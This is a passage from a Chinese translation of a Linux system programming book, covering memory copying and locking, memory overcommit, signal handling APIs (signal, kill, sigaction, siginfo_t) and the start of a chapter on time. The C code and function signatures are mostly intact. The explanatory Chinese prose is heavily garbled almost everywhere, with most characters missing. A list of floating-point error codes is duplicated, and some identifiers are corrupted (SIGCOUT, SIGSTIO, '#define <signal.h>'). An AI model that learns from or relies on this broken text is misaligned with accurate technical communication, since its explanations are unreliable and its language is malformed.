内存的 memmove() 。能
– 288 –
8
内存理
#include <string.h>
void * memcpy (void *dst, const void *src, size_t
n);
dst src 间能 memmove() 。
的的。的 memccpy()
#include <string.h>
void * memccpy (void *dst, const void *src, int
c, size_t n);
memccpy() memcpy() c src 的 n
时。 dst c 的或 c 时
NULL。
我们以 mempcpy() 的内存
#define _GNU_SOURCE
#include <string.h>
void * mempcpy (void *dst, const void *src,
size_t n);
mempcpy() memcpy() memccpy() 的
的内存的的的。内存的
时的。的性能提的
dst+n 。 GNU 的。
8.9.4 字节搜索
memchr() memrchr() 以内存给的
#include <string.h>
void * memchr (const void *s, int c, size_t n);
memchr() s 的的 n c c 将 unsigned
char
#define _GNU_SOURCE
– 289 –
8
内存理
#include <string.h>
void * memrchr (const void *s, int c, size_t n);
c 的的 c NULL。
memrchr() memchr() s 的内存 n
。 memchr() 同 memrchr() GNU 的扩展 C 的
。对更的的 memmem() 以内
存的
#define _GNU_SOURCE
#include <string.h>
void * memmem (const void *haystack,
size_t haystacklen,
const void *needle,
size_t needlelen);
memmem() haystacklen 的内存 haystack
needlelen 的 needle 的子的。 haystack 能
needle NULL。同 GNU 的扩展。
8.9.5 字节加密
Linux 的 C 提进单的
#define _GNU_SOURCE
#include <string.h>
void * memfrob (void *s, size_t n);
memfrob() 将 s 的的 n 42 进异或操作
对进。 s。
对相同的调 memfrob() 以将。程对
secret 进实性的操作
memfrob (memfrob (secret, len), len);
时绝对的(更的的
对的单处理。 GNU 。
– 290 –
8
内存理
8.10 内存锁定
Linux 实页调页调时将页进
时出。进程的空间实的
理内存小的同时上的空间提
理内存的
对进程的程(
内页调的。然程能
的页调
性(Determinism 时间的程自页的调
。内存操作页 - 的
操作 - 程能超出的时间。
能的页内存进
程能内存操作页提
的的程提效能。
性(Security
内存能页调
以的方式存上。
的以的方式存上的
内存的备能存文
件。性的能
。的程以将
理内存上。
然内的能对的的。的
性性能提的页内存的
页能出内存。我们相内的设将的页
出能的页。的的
能将的页出。
8.10.1 锁定部分地址空间
POSIX1003.1b-1993 将或更的页理内
存们。给的间
– 291 –
8
内存理
#include <sys/mman.h>
int mlock (const void *addr, size_t len);
调 mlock() 将 addr len 的内存。的
0时 -1设 errno。
调将 [addr,addr+len) 的理内存页。调
的理页将。 POSIX
addr 页对。 Linux 真的时
的将 addr 调的页。对的程
addr 页对的。
的 errno
EINVAL
len 。
ENOMEM RLIMIT MEMLOCK 的页 (
)。
EPERM
RLIMIT MEMLOCK 0进程 CAP IPC LOCK 。(同
。
fork() 的子进程进程处
的内存。然 Linux 对空间写时子
进程的页内存子进程对们写操作。
子设程内存的
。进程以的页
int ret;
/* lock ’secret’ in memory */
ret = mlock (secret, strlen (secret));
if (ret)
perror (”mlock”);
8.10.2 锁定全部地址空间
进程理内存的空间 mlock()
。 POSIX mlockall() 满实时的
– 292 –
8
内存理
#include <sys/mman.h>
int mlockall (int flags);
mlockall() 进程空间理内存的页。
flags 的或操作以
MCL CURRENT 设 mlockall() 将映射的页(
段映射文件) 进程空间。
MCL FUTURE
设 mlockall() 将映射的页
进程空间。
程同时设。时 0时
-1设 errno
EINVAL
len 。
ENOMEM 的 页 RLIMIT MEMLOCK 的 (
)。
EPERM
RLIMIT MEMLOCK 0进程 CAP IPC LOCK 。(同
。
8.10.3 内存解锁
POSIX 提将页内存内将
页出
#include <sys/mman.h>
int munlock (const void *addr, size_t len);
int munlockall (void);
调 munlock() addr len 的内存的页。
mlock() 的效。 munlockall() mlockall() 的效。时
0时 -1设 errno
EINVAL
len (对 munlock()。
ENOMEM 的页的。
EPERM
RLIMIT MEMLOCK 0进程 CAP IPC LOCK 。(同
。
– 293 –
8
内存理
内存。以 mlock() 或 mlockall()
mlock() 或 munlock()即页的。
8.10.4 锁定的限制
内存的能的性能 - 实上的页
内存 ——Linux 对进程能的页进。
CAP IPC LOCK 的进程能的页。的进
程能 RLIMIT MEMLOCK 。 32KB(将
内存) 对性能。( 6
设
8.10.5 这个页面在物理内存中吗?
出调的 Linux 提 mincore() 以给
内的内存理内存
#include <unistd.h>
#include <sys/mman.h>
int mincore (void *start,
size_t length,
unsigned char *vec);
调 mincore() 提调时映射页理内
存。 vec start(页对
length(对的内存的页的。 vec 的对
内的页对页然对。
vec (length-1+page size)/page size 。页理内
存对的 1 0。的
。
时 0。时 -1设 errno
EAGAIN
内的满。
EFAULT
vec 。
EINVAL
start 页对。
ENOMEM [address,address+1) 的内存文件的映射。
– 294 –
8
内存理
, 调能以 MAP SHARED 的文件的映射
上。程上的。
8.11 投机性存储分配策略
Linux 。进程内的内存 - 扩的
段或新的存映射 - 内作出实上
给进程何的理存。进程对新的内存作写操作的时
内理内存。内页上工作
时进页调写时。
处理。内存内将工作
(实进时)。页的
真理内存的时理存。的内存
能实的理内存的空间。超
(overcommitment。
8.11.1 超量使用和内存耗尽
页理存相时理存的
更更的程。超写时
映射 2GB 文件内出 2GB 的理存。超映射 2GB 文
件的存进程映射真进写操作的页的小。同
超页进写时 fork() 操作
空内存空间。
的进程满超的内存理内存
空间时或更的
。内给进程内存 (调), 进程
的内存内能进程的内存以满
的。
超内存以满时我们内存
(OOM(out of memory。处理 OOM内 OOM (killer)
进程。的内出
内存的进程。
OOM 实出 - 以效的超实的。然
– 295 –
8
内存理
以的 OOM进程然 OOM (killer)
。
对出的内文件 /proc/sys/vm/overcom-
mit memory 超能相的 sysctl 的 vm.overcommit memory
。
的 0内的超理内实
超超出时。 1 时的将
。对存的程 ()
们实更的内存时。
2 时的(strict accounting
。式的内存小空间小上调的
理内存小。以文件 /proc/sys/vm/overcommit ratio 设作
vm.overcommit ratio 的 sysctl 相。 50的内存
空间上理内存的。理内存内页
页页东。的能满。
时小设 OOM (killer)
的。然程进
的、超能满的
设内存的。
– 296 –
9
第 9 章
信号
提处理异步件的件。件以自
( Ctrl-C或自程或内内的
进程以零的。作进程间(IPC的式进
程以给进程。
件的异步的(以程的何
时 Ctrl-C程对的处理异步的。处理内
时内程的异步调处理。
Unix 的。时间的的进。
性方的能出的能方
以的。同的 Unix 对同的
。的 POSIX 的处理。
Linux 提的我们将的。
我们们的。我
们 Linux 理操作的。
出的程。即设进
的程(的然
处理程。
9.1 信号概念
的周。(我们时
出或。然内存以。空内
的处理。内进程的以以程
何操作。能 SIGKILL
SIGSTOP。的原理能或进
程进程能 SIGKILL(进程能或
SIGSTOP(进程能将。
处理 内进程的的
。进程。进程
– 297 –
9
的方。
SIGINT SIGTERM 的的。进程
SIGINT 处理的能
提示。进程 SIGTERM 以
的理工作或时文件。 SIGKILL
SIGSTOP 能。
操作
操作作的。操作进程。
对 SIGKILL 。然程
的的提的的
的程对们。我们
们的操作。
处理的
对。内能给的程提的
上文能的更的 IPC 。
9.1.1 信号标识符
以 SIG 的。 SIGINT Ctrl-
C 时出的 SIGABRT 进程调 abort() 时的 SIGKILL
进程时的。
<signal.h> 文件的。处理程单的
相。
的映射实的同的 Unix 同的
的以同的方式映射的( SIGKILL 9。
的程的读的的。
的 1 ( SIGHUP性。 31
的程们的。何的 0
的空。空实的
调( kill()的 0 。
以 kill-l 的的。
9.1.2 Linux 支持的信号
9-1 出 Linux 的。
– 298 –
9
9-1
– 299 –
9
操作
SIGABRT
abort()
进内存
SIGALRM
alarm()
SIGBUS
件或对
进内存
SIGCHLD
子进程
SIGCONT
进程
SIGFPE
异
进内存
SIGHUP
进程的(的
出
SIGILL
进程
进内存
SIGINT
(Ctrl-C
SIGIO
异步 IO 件(Ctrl-C
(a)
SIGKILL
能的进程
SIGPIPE
读进程的写
SIGPROF
读进程的写
SIGPWR
SIGQUIT
出(Ctrl-\
进内存
SIGSEGV
效内存
进内存
SIGSTKFLT 处理
(b)
SIGSTOP
进程
SIGSYS
进程效调
进内存
SIGTERM
以的进程
SIGTRAP
进
进内存
SIGSTP
操作(Ctrl-Z
SIGTTIN
进程读
SIGTTOU
进程写
SIGURG
I/O 处理
SIGUSR1
进程自的
SIGUSR2
进程自的
SIGVTALRM ITIMER VIRTUAL 调
setitimer() 时
SIGWINCH
小
SIGXCPU
进程超
进内存
SIGXFSZ
文件超
进内存
– 300 –
9
a 的 Unix ( BSD。
b Linux 内。
的存 Linux 将们 SIGINFO
SIGPWR∗ SIGIOT SIGABRT SIGPOLL SIGLOST
SIGIO。
我们我们的
SIGABRT
abort() 将给调的进程。然进程
内存文件。 Linux assert()
件的时调 abort()。
SIGALRM
alarm() setitimer()(以 ITIMER REAL 调
超时时调们的进程。
将以及相的。
SIGBUS
进程内存的件时
内存 SIGSEGV。的 Unix
的对的
内存。然 Linux 内能自
。进程以的方式
mmap()(对内存映射的的内存
时内。内将进程进内存
。
SIGCHLD
进程或时内给进程的进程
。的 SIGCHLD 的进程对
们的子进程存进程示
处理。的处理程调 wait()(
的内子进程的 pid 出。
SIGCONT
进 程 时内 给 进 程
。的进程
操作以。
或新。
SIGFPE
的的异
相的异。异出
∗ Alpha 的。的存。
– 301 –
9
以 0。的操作进程内存文件进
程以处理。进程
进程的及操作的的。
SIGHUP
的时内给进程
。进程时内给进程的
进程。操作进程
出。进程
示进程们的文件。给 Apache
SIGHUP 以新读 http.conf 文
件。的 SIGHUP 的
性的。的进程
。
SIGILL
进程时内
。操作进程进内存。进程以
处理 SIGILL的
的。
SIGINT
( Ctrl-C时给
进程的进程。的操作进程进
程以处理进
理工作。
SIGIO
BSD 的 I/O 件时出。(
对 I/O 的对 Linux
的。
SIGKILL
kill() 调出的存给
理提的方件进程。
能或的进程。
SIGPIPE
进 程 写 读 的 进 程
内。的操作进程
以处理。
SIGPROF
时 超 时 ITIMER VIRTUAL 调
setitimer() 。操作进程。
SIGPWR
相的。 Linux
– 302 –
9
件(的(UPS。
UPS 进程然作出
进理。
SIGQUIT
出(Ctrl-\时内给
进程的进程。的操作
进程进内存。
SIGSEGV
的段进程进内存
时内出。映射
的内存读的内存读的内存
或写的内存写。进程以
处理的操作进程进内存
。
SIGSTOP
kill() 出。件进程
能或。
SIGSYS
进程调效的调时内进
程。进文件新
的操作上的(新的调
的操作上能
。 glibc 进调的进文件
。相效的调
-1将 errno 设 ENOSYS。
SIGTERM
kill() 的进
程(操作。进程以进程
进理及时的进
程的。
SIGTRAP
进程时内给进程。
调进程。
SIGTSTP
( Ctrl-Z时内给
进程的进程。
SIGTTIN
进程的读时
给进程。的操作进程。
SIGTTOU
进程的写时
– 303 –
9
给进程。的操作进程。
SIGURG
(OOB时内给进程
。超出的。
SIGUSR1 SIGUSR2 给 自 的内
们。进程以以何的 SIGUSR1 SIGUSR2。
的示进程进同的操作。的操作
进程。
SIGVTALRM
以 ITIMER VIRTUAL 的时超时时
setitimer() 。时。
SIGWINCH
小时内给进程的进程
。的进程
们的小们以处理
。的程的子 top—
时的小何的。
SIGXCPU
进程超处理时内给进程
。内的进程
出或超处理。超内
给进程 SIGKILL 。
SIGXFSZ
进程超的文件小时内给进程
。的操作进程或
文件超的调将 -1
将 errno 设 EFBIG。
9.2 基本信号管理
单的理 signal() 。 ISO C89
的的同调的。
Linux 提更的我们将。
signal() 的 ISO C 的的相
我们:
#include <signal.h>
typedef void (*sighandler_t)(int);
– 304 –
9
sighandler_t signal (int signo, sighandler_t
handler);
的调 signal() signo 的操作以 handler
的新处理程。 signo 的的
SIGINT 或 SIGUSR1。进程能 SIGKILL SIGSTOP给
设处理程的。
处理 void理的(的
程方给。处理
的( SIGUSR2。处理以处理。
原
void my_handler (int signo);
Linux typedef 将原 sighandler t。的 Unix
们自的能以 sighandler t 。
性的程。
内给处理程的进程时内程的
调处理程。的给处理程
signo 提给 signal() 的。
以 signal() 示内对的进程或新设
的操作。以的实
SIG DFL 将 signo 示的设操作。对 SIGPIPE进程将
。
SIG IGN signo 示的。
signal() 的 操 作 处 理 程
SIG DFL 或 SIG IGN 的。出时 SIG ERR设 errno。
9.2.1 等待信号
出调写示的的 POSIX 的 pause() 调以
进程进程处理或进程的
#include <unistd.h>
int pause (void);
– 305 –
9
pause() 的时处理
pause() -1将 errno 设 EINTR。内出的
进程。
Linux 内 pause() 单的调。操
作。将进程的。然调 schedule() Linux
进程调进程。进程实上何件
内的。实调 C 。∗
9.2.2 例子
我们单的子。子 SIGINT 单的
处理程然程( SIGINT
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
/* SIGINT 的处理程 */
static void sigint_handler (int signo)
{
/*
* 上处理程
printf()
* 的。
* 我以。
*/
printf (”Caught SIGINT!\n”);
exit (EXIT_SUCCESS);
}
int main (void)
∗ pause() 单的调。的 getpid() gettid()们。
– 306 –
9
{
/*
* sigint_handler 作 SIGINT 的处理程
。
*/
if (signal (SIGINT, sigint_handler) ==
SIG_ERR) {
fprintf (stderr, ”Cannot handle
SIGINT!\n”);
exit (EXIT_FAILURE);
}
for (;;)
pause ( );
return 0;
}
的子我们 SIGTERM SIGINT 相同的处理程
。我们将 SIGPROF 操作(进程 SIGHUP(
进程
#include
<stdlib.h>
#include
<stdio.h>
#include
<unistd.h>
#include
<signal.h>
/* SIGINT 的处理程 */
static void signal_handler (int signo)
{
if (signo == SIGINT)
printf (”Caught SIGINT!\n”);
else if (signo == SIGTERM)
printf (”Caught SIGTERM!\n”);
else {
– 307 –
9
/* */
fprintf (stderr, ”Unexpected signal!\n”);
exit (EXIT_FAILURE);
}
exit (EXIT_SUCCESS);
}
int main (void)
{
/*
* signal_handler 作 SIGINT 的处理程。
*/
if (signal (SIGINT, signal_handler) == SIG_ERR)
{
fprintf (stderr, ”Cannot handle SIGINT!\n”);
exit (EXIT_FAILURE);
}
/*
* signal_handler 作 SIGTERM 的处理程。
*/
if (signal (SIGTERM, signal_handler) ==
SIG_ERR) {
fprintf(stderr, ”Cannot handle SIGTERM!\n”);
exit (EXIT_FAILURE);
}
/* 将 SIGPROF 设操作。 */
if (signal (SIGPROF, SIG_DFL) == SIG_ERR) {
fprintf (stderr, ”Cannot reset SIGPROF!\n”);
exit (EXIT_FAILURE);
}
/* SIGHUP 。 */
if (signal (SIGHUP, SIG_IGN) == SIG_ERR) {
– 308 –
9
fprintf (stderr, ”Cannot ignore SIGHUP!\n”);
exit (EXIT_FAILURE);
}
for (;;)
pause ( );
return 0;
}
9.2.3 执行与继承
进程时的设操作进程(
新进程的进程们新的进程
。新进程何进程的操作
的。理的的进程进程
的空间何的处理程能存。
进程程的的内
进程时(或进程进程新的进程
出。内进程将 SIGINT
SIGQUIT 设 SIG IGN。处理的程以
的。
/* SIG_INT 时处理 */
if (signal (SIGINT, SIG_IGN) != SIG_IGN) {
if (signal (SIGINT, sigint_handler) == SIG_ERR)
fprintf (stderr, ”Failed to handle
SIGINT!\n”);
}
/* SIGQUIT 时处理 */
if (signal (SIGQUIT, SIG_IGN) != SIG_IGN) {
if (signal(SIGQUIT, sigquit_handler) == SIG_ERR)
fprintf (stderr, ”Failed to handle
SIGQUIT!\n”);
– 309 –
9
}
设的的 signal() 出
的。我们的。
fork() 的能的同。进程调 fork() 时子进程
同的。理的子进程进程同空
间进程的处理程然存子进程。
9.2.4 映射信号编号为字符串
我们的子我们将。时将
的更方(。方以
的。
extern const char * const sys_siglist[];
sys siglist 存的的进
。
BSD 的 psignal() Linux 的
#include <signal.h>
void psignal (int signo, const char *msg);
调 psignal() stderr 出提的 msg
空 signo 示的。 signo 效的出
将进提示。
更的 strsignal()。的 Linux Linux
#define _GNU_SOURCE
#include <string.h>
char *strsignal (int signo);
调 strsignal() signo 的。 signo 效
的的以提示(的 Unix NULL。
的调 strsignal() 效的程
的。
– 310 –
9
sys siglist 的。方我们以写我们的
处理程
static void signal_handler (int signo)
{
printf (”Caught %s\n”, sys_siglist[signo]);
}
9.3 发送信号
kill() 调我们的 kill 以的 kill()
进程进程
#include <sys/types.h>
#include <signal.h>
int kill (pid_t pid, int signo);
的 kill() 给 pid 的进程 signo。
pid 0 signo 给调进程的进程的进程。
pid -1 signo 调进程的进程出
调进程自 init 。我们将小的理。
pid 小 -1 signo 给进程 -pid。
的 kill() 0。出调
的。的(调 -1将 errno 设以
EINVAL signo 的效。
EPERM 调进程的进程。
ESRCH
pid 的进程或进程存或进程进程。
9.3.1 权限
给进程的进程的。 CAP KILL
的进程(的进程能给何进程。
进程的效的或真的 ID 进程的真的或存的
ID。单的能给或自的进程。
– 311 –
9
Unix SIGCOUT 同进
程以给何的进程。 ID 相同。
signo 0提的空调
然进。对进程
的给的进程时。
9.3.2 例子
以何给进程 1722 的进程 SIGHUP 的
int ret;
ret = kill (1722, SIGHUP);
if (ret)
perror (”kill”);
以上段的 kill 能相同
$ kill -HUP 1722
我们给 1722 进程实上何我
们以方式进
int ret;
ret = kill (1722, 0);
if (ret)
; /* 我们 */
else
; /* 我们 */
9.3.3 给自己发送信号
raise() 单的进程给自的方
#include <signal.h>
int raise (int signo);
– 312 –
9
调
raise (signo);
的调的
kill (getpid (), signo);
调时 0时 0 。设 errno。
9.3.4 给整个进程组发送信号
方的给进程的进程
单进程的 ID 的作调 kill()
#include <signal.h>
int killpg (int pgrp, int signo);
调
killpg (pgrp, signo);
的调
kill (-pgrp, signo);
即 pgrp 0的 kill() 给调进程的
进程 signo。
时 killpg() 0时 -1将 errno 设以
EINVAL signo 的效。
EPERM 调进程的给进程。
ESRCH
pgrp 的进程存。
9.4 重入
内时进程能的何。进程能
的操作进程将处的(
更新或进。进程能处理
。
– 313 –
9
时处理程能进程处理程
以何。何进程设的处理程谨的对
的操作及的。处理程对进程时
的何设。(的时
谨。的处理程的
的我们时的方提处理
处理程进程的操作方。
调的进程写文件或
内存处理程同文件写或调 malloc() 或
时进程调存的 strsignal()
然的。程的
处理程调同的的
。以的调自(或同进程的
程的。能操作操作
的或调提的调何的。
9.4.1 有保证的可重入函数
写处理程时设的进程能处的
(或的东。处理程
。
布(即的单处
理程的。的 POSIX.1-2003 Unix 们
上的单。 9-2 出
。
9-2 的的
– 314 –
9
abort()
accept()
access()
aio error()
aio return()
aio suspend()
alarm()
bind()
cfgetispeed()
cfgetospeed()
cfsetispeed()
cfsetospeed()
chdir()
chmod()
chown()
clock gettime()
close()
connect()
creat()
dup()
dup2()
execle()
execve()
Exit()
exit()
fchmod()
fchown()
fcntl()
fdatasync()
fork()
fpathconf()
fstat()
fsync()
ftruncate()
getegid()
geteuid()
getgid()
getgroups()
getpeername()
getpgrp()
getpid()
getppid()
getsockname()
getsockopt()
getuid()
kill()
link()
listen()
lseek()
lstat()
mkdir()
mkfifo()
open()
pathconf()
pause()
pipe()
poll()
posix trace event()
pselect()
raise()
read()
readlink()
recv()
recvfrom()
recvmsg()
rename()
rmdir()
select()
sem post()
send()
sendmsg()
sendto()
setgid()
setpgid()
setsid()
setsockopt()
setuid()
shutdown()
sigaction()
sigaddset()
sigdelset()
sigemptyset()
sigfillset()
sigismember()
signal()
sigpause()
sigpending()
sigprocmask()
sigqueue()
sigset()
sigsuspend()
sleep()
socket()
socketpair()
stat()
symlink()
sysconf()
tcdrain()
tcflow()
tcflush()
tcgetattr()
tcgetpgrp()
tcsendbreak()
tcsetattr()
tcsetpgrp()
time()
timer getoverrun()
timer gettime()
timer settime()
times()
umask()
– 315 –
9
更的的 Linux POSIX 的
的。
9.5 信号集
我们将提的操作集进程
的的集或处理的集。以出的集操作以理
集
#include <signal.h>
int sigemptyset (sigset_t *set);
int sigfillset (sigset_t *set);
int sigaddset (sigset_t *set, int signo);
int sigdelset (sigset_t *set, int signo);
int sigismember (const sigset_t *set, int signo);
sigemptyset() set 给的集将集空(的
集。 sigfillset() set 给的集将满(
的集内。 0。集调
。
sigaddset() 将 signo set 给的集 sigdelset() 将 signo set 给
的集。时 0时 -1 errno
设 EINVAL signo 效的。
signo set 的集 sigismember() 1
0时 -1。 errno 设 EINVA signo 效。
9.5.1 更多的信号集函数
上的 POSIX 的以何的 Unix
。 Linux 提的
#define _GNU_SOURCE
#define <signal.h>
int sigisemptyset (sigset_t *set);
– 316 –
9
int sigorset (sigset_t *dest, sigset_t *left,
sigset_t *right);
int sigandset (sigset_t *dest, sigset_t *left,
sigset_t *right);
set 给的集空的 sigisemptyset() 1 0。
sigorset() 将集 left right 的(进或给 dest。 sigandset() 将
集 left right 的(进给 dest。时 0时
-1将 errno 设 EINVAL。
的 POSIX 的程
们。
9.6 阻塞信号
我们处理程异步的。我们
能处理程内调的们的。
的程处理程程时
程的间(自处理程
的时我们我们时
们。我们。何的处理
们。进程以进程的进程
的。 POSIX Linux 实理进程的
#include <signal.h>
int sigprocmask (int how,
const sigset_t *set,
sigset_t *oldset);
sigprocmask() 的 how 的以
SIG SETMASK 调进程的 set。
SIG BLOCK
set 的调进程的。
set 的集(进或。
SIG UNBLOCK set 的调进程的。
set 集(进的集(进
– 317 –
9
。将的的。
oldset 空的将 oldset 设的集。
set 空的 how然设
oldset 的。给 set 空的方
。
调 0。时 -1 errno 设 EINVAL示 how
效的或设 EFAULT示 set 或 oldset 效。
SIGKILL 或 SIGSTOP 的。 sigprocmask() 的何将
的。
9.6.1 获取待处理信号
内的时。我们处理
。处理时内给进程处理。
POSIX 处理集的
#include <signal.h>
int sigpending (sigset_t *set);
的调 sigpending() 将 set 设处理的集 0。
时调 -1将 errno 设 EFAULT set 效。
9.6.2 等待信号集
POSIX 的进程时的
出进程或进程处理的
#include <signal.h>
int sigsuspend (const sigset_t *set);
进程 sigsuspend() 。处
理 sigsuspend() 处理程 -1 将 errno 设 EINTR。
set 效 errno 设 EFAULT。
程间的时
sigsuspend()。进程 sigprocmask() 集将的
存 oldset 。出进程调 sigsuspend()将 oldset 给 set。
– 318 –
9
9.7 高级信号管理
我们的 signal() 的。 C 的
对的操作能小的设提
的理的。作 POSIX sigaction() 调
提更的理能。处理程时以
的以时操作
进程的
#include <signal.h>
int sigaction (int signo,
const struct sigaction *act,
struct sigaction *oldact);
调 sigaction() signo 示 的 的 signo 以
SIGKILL SIGSTOP 的何。 act 空的调将
的 act 的。 oldact 空的调存
(或的 act 空的给的。
sigaction 的。文件 <sys/signal.h> <signal.h> 以
式
struct sigaction {
void (*sa_handler)(int);
/* 处理程或操作 */
void (*sa_sigaction)(int, siginfo_t *, void *);
sigset_t sa_mask;
/* 的 */
int sa_flags;
/* */
void (*sa_restorer)(void); /* 时
POSIX */
}
sa handler 时的操作。对 signal() 能
SIG DFL示操作能 SIG IGN示内或
处理的。 signal() 的处理程相同的原
– 319 –
9
void my_handler (int signo);
sa flags SA SIGINFO将 sa sigaction sa handle
示处理。的原同
void my_handler (int signo, siginfo_t *si, void
*ucontext);
作的 siginfo t 作
ucontext t ( void 作。。 siginfo t
给处理程提的我们。
(能的 Unix sa handler
sa sigaction 能给同时。
sa mask 提处理程时的集。程
处理程间的提的。处理的
的将 sa flags 设 SA NODEFER 。以 SIGKILL 或
SIGSTIO调 sa mask 的们。
sa flag 零或更 signo 示的的。我们
SA SIGINFO SA NODEFER sa flags 的以
SA NOCLDSTOP signo SIGCHLD示子进程或
时提。
SA NOCLDWAIT signo SIGCHLD以自子进程子进程
时进程进程(能
子进程调 wait()。对子进程进程 wait() 的
。
SA NOMASK
时 POSIX SA NODEFER
(。 SA NODEFER
的能。
SA ONESHOT
时 POSIX SA NODEFER
(文。 SA NODEFER
的能。
SA ONSTACK
示的调给的处理
程 sigaltstack() 提的。提
– 320 –
9
的的的
提。的的然们
小程的 pthreads 程的程
处理程时能出。我们
进步 sigaltstack()。
SA RESTART
以的调以 BSD 新。
SA RESETHAND 示性式。处理程给
设操作。
sa restorer 时的 Linux 。 POSIX 的
。存。
时 sigaction() 0。时调 -1将 errno 设以
EFAULT act 或 oldact 效。
EINVAL signo 效的 SIGKILL 或 SIGSTOP。
9.7.1 siginfo t 结构
siginfo t <sys/signal.h> 的
typedef struct siginfo_t {
int si_signo;
/* */
int si_errno;
/* errno */
int si_code;
/* */
pid_t si_pid;
/* 进程的PID */
uid_t si_uid;
/* 进程的真实UID */
int si_status;
/* 出或 */
clock_t si_utime;
/* 时间 */
clock_t si_stime;
/* 时间 */
sigval_t si_value; /* */
int si_int;
/* POSIX.1b */
void *si_ptr;
/* POSIX.1b */
void *si_addr;
/* 的内存 */
int si_band;
/* 件 */
– 321 –
9
int si_fd;
/* 文件 */
};
给处理程的( sa sigaction
sa sighandler。 Unix
的实 IPC(进程间的方。能们
sigaction() SA SIGINFO 时然 signal()。 siginfo t 我
们方上的能。
的进程的以及
的原。以对的
si signo 的。的处理程提(
的。
si errno 零示的。对的
效。
si code
进程以及(自 kill()出。我们
能的。对的效。
si pid
对 SIGCHLD示进程的 PID。
si uid
对 SIGCHLD示进程自的 UID。
si status 对 SIGCHLD示进程的出。
si utime 对 SIGCHLD示进程的时间。
si stime 对 SIGCHLD示进程的时间。
si value si int si ptr 的。
si int
对 sigqueue() 的(的的
以作。
si ptr
对 sigqueue() 的(的的
以 void 作。
si addr
对 SIGBUS SIGFPE SIGILL SIGSEGV SIGTRAP void
的。对 SIGSEGV内
存的( NULL。
si band
对 SIGPOLL示 si fd 出的文件的。
si fd
对 SIGPOLL示操作的文件的。
– 322 –
9
si value si int si ptr 相对的进程以们给
进程何。以们或
的(进程空间的。
的的。
POSIX 对效的。的处理相
的时。 SIGPOLL 时 si fd 。
9.7.2 si code 的精彩世界
si code 的原。对的
何的。对内的的原。
以的 si code 对何效的。们何 /
。
SI ASYNCIO 异步 I/O (。
SI KERNEL
内。
SI MESGQ
POSIX 的(的
内。
SI QUEUE
sigqueue() (。
SI TIMER
POSIX 时超时(。
SI TKILL
tkill() 或 tgkill() 。调程的
的内。
SI SIGIO
SIGIO 。
SI USER
kill() 或 raise() 。
以的 si code 对 SIGBUS 效。们件的
BUS ADRALN 进程对(间对对的。
BUS ADRERR 进程效的理。
BUS OBJERR
进程的件。
对 SIGCHLD以的示子进程给进程时的
CLD CONTINUED 子进程。
CLD DUMPED
子进程。
CLD EXITED
子进程 exit() 。
– 323 –
9
CLD KILLED
子进程。
CLD STOPPED
子进程。
CLD TRAPPED
子进程进。
以的对 SIGFPE 效。们的
FPE FLTDIV
进程以 0 的。
FPE FLTOVF 进程出的。
FPE FLTINV
进程效的。
FPE FLTRES
进程或效的。
FPE FLTSUB 进程超出的。
FPE FLTUND 进程的。
FPE INTDIV
进程以 0 的。
FPE INTOVF 进程出的。
FPE FLTDIV
进程以 0 的。
FPE FLTOVF 进程出的。
FPE FLTINV
进程效的。
FPE FLTRES
进程或效的。
FPE FLTSUB 进程超出的。
FPE FLTUND 进程的。
FPE INTDIV
进程以 0 的。
FPE INTOVF 进程出的。
以 si code 对 SIGILL 效。们的性
ILL ILLADR 进程进的式。
ILL ILLOPC
进程的操作。
ILL ILLOPN 进程的操作。
ILL PRVOPC 进程操作。
ILL PRVREG 进程存上。
ILL ILLTRP
进程进的。
对的 si addr 操作的。
对 SIGPOLL以的的 I/O 件
– 324 –
9
POLL ERR I/O 。
POLL HUP 设备或。
POLL IN
文件读。
POLL MSG 。
POLL OUT 文件能写。
POLL PRI
文件读的。
以的对 SIGSEGV 效存的
SEGV ACCERR 进程以效的方式效的内存进程
内存的。
SEGV MAPERR 进程效的内存。
对 si addr 操作的。
对 SIGTRAP si code 进的
TRAP BRKPT 进程进。
TRAP TRACE 进程进。
si code 。
9.8 发送带附加信息的信号
我们的以 SA SIGINFO 的处理程
siginfo t 。 si value 的以
。
POSIX 的 sigqueue() 进程的
#include <signal.h>
int sigqueue (pid_t pid,
int signo,
const union sigval value);
sigqueue() kill() 的方式。时 signo 示的
pid 的进程或进程的 0。的给
的 void 的
– 325 –
9
union sigval {
int sival_int;
void *sival_ptr;
};
时调 -1将 errno 设以
EINVAL signo 的效。
EPERM 调进程的给何的进程。的
kill() 的(的。
ESRCH
pid 的进程或进程存或进程进程。
9.8.1 例子
子给 pid 1722 的进程的 SIGUSR2
404
sigval value;
int ret;
value.sival_int = 404;
ret = sigqueue (1722, SIGUSR2, value);
if (ret)
perror (”sigqueue”);
1722 进程 SA SIGINFO 处理程处理 SIGUSR2 signo
设 SIGUSR2 si->si int 设 404 si->si code 设 SI QUEUE。
9.9 结论
Unix 程的。们时的内间
的能原的进程间。程程
件的。
然我们们。内(
进程的操作的方式。 Unix(Linux
进程理 / 子进程的方式。我们们。
的理写出的的处理程
– 326 –
9
。能的处理程 9-2 出的(以
们的。
的 程 然 signal() kill()
sigaction() sigqueue() 理 。 小 的
SA SIGINFO 的处理程时的性。
我喜(我文件的的
实上 Linux 内的们的
Linux 的实以的(。
– 327 –
10
时间
第 10 章
时间
时间操作程。内
时间
墙上时间(或真实时间)
真实世的实时间墙上的时间。进程
以及件时间时墙上时间。
进程时间
即进程的时间空间的时间内进程
上的时间。进程对程进时 (
操作时)。 Linux 的进程时墙上时间
操作的进程时间能墙上时间。进程相
时周 I/O(。
单调时间
时间性的。 Linux 内的操作
的时间(的时间。墙上时间能 (
以进设或调校时间),
性。时间方的
的时间示方。单调时间的性以时间
性性时间的。
单调时间相对时间墙上时间对绝对时间更理
。
时间方以以式
相对时间
相对时间(时的子 5
或 10 。
绝对时间
示何的时间 1968 3 25 。
相对绝对时间式的。进程能 500 内
新 60 或操作 7 。
– 328 –
10
时间
相对时间。能存聚 2
8 文件将文件时写的时间(5
的相对时间的时示自的相
对时间。
Unix 1970 1 1 00:00:00以
的示绝对时间。 UTC(调世时 GMT(林
时间或时间。的 Unix 即绝对时间
更相对的。 Unix 的存自
以的我们将。
件时内的时操作件时时间进
程。内率的周时时
(system timer)。时间时内将时间单
tick 或 jiffy。 jiffy 的作 jiffy (jiffies counter)。
jiffy 以 32 2.6 Linux 内 64 进。∗
Linux 的时率 HZ同的
。 HZ 的相的 Linux ABI 的
程能能。上 x86
100示时 100 (时的率
100HZ。 jiffy 的 0.01 1/HZ 。 2.6 Linux 内内
HZ 的子提 1000 jiffy 的 0.001 。然
